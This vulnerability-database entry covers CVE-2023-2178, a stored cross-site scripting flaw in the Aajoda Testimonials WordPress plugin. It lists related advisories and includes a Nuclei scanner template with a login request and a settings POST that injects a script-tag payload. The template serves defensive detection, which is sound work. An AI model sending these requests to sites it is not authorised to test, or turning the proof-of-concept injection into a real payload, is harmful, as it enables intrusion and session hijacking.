Aajoda Testimonials < 2.2.2 - Cross-Site Scripting

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType

Aajoda Testimonials < 2.2.2 - Cross-Site Scripting vulnerability allows high-privilege users to execute malicious scripts, posing data theft and session hijacking risks. Update to version 2.2.2 to fix

Reporter	Title	Published	Views	Family All 15
BDU FSTEC	The vulnerability of the Aajoda Testimonials plugin of the WordPress content management system allows attackers to perform cross-site scripting attacks.	1 Nov 202300:00	–	bdu_fstec
CNNVD	WordPress plugin Aajoda Testimonials 跨站脚本漏洞	27 Jun 202300:00	–	cnnvd
CVE	CVE-2023-2178	27 Jun 202313:17	–	cve
Cvelist	CVE-2023-2178 Aajoda Testimonials < 2.2.2 - Admin+ Stored XSS	27 Jun 202313:17	–	cvelist
EUVD	EUVD-2023-33695	3 Oct 202520:07	–	euvd
NVD	CVE-2023-2178	27 Jun 202314:15	–	nvd
OSV	CVE-2023-2178	27 Jun 202314:15	–	osv
Patchstack	WordPress Aajoda Testimonials Plugin < 2.2.2 is vulnerable to Cross Site Scripting (XSS)	7 Jun 202300:00	–	patchstack
Prion	Cross site scripting	27 Jun 202314:15	–	prion
Positive Technologies	PT-2023-6576 · WordPress · Aajoda Testimonials	5 Jun 202300:00	–	ptsecurity

Source	Link
wpscan	www.wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb
downloads	www.downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip
nvd	www.nvd.nist.gov/vuln/detail/CVE-2023-2178

id: CVE-2023-2178

info:
  name: Aajoda Testimonials < 2.2.2 - Cross-Site Scripting
  author: Farish
  severity: medium
  description: |
    The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb
    - https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2178
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2023-2178
    cwe-id: CWE-79
    epss-score: 0.00773
    epss-percentile: 0.50881
    cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: aajoda
    product: aajoda_testimonials
    framework: wordpress
  tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "></textarea><script>alert(document.domain)</script>")'
          - 'contains(body_2, "page_aajoda-testimonials")'
        condition: and
# digest: 4b0a00483046022100e2f4cb16c27572f1cccf43f78b28dac0d0b82166a1045e91825733f9ec897a2f022100a3a02a3cdc9eb75ce9a7b7695dc8b98137a45a884adcc0e408be5cc46319d653:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.2Medium risk

Vulners AI Score6.2

CVSS 3.14.8

EPSS0.00773

SSVC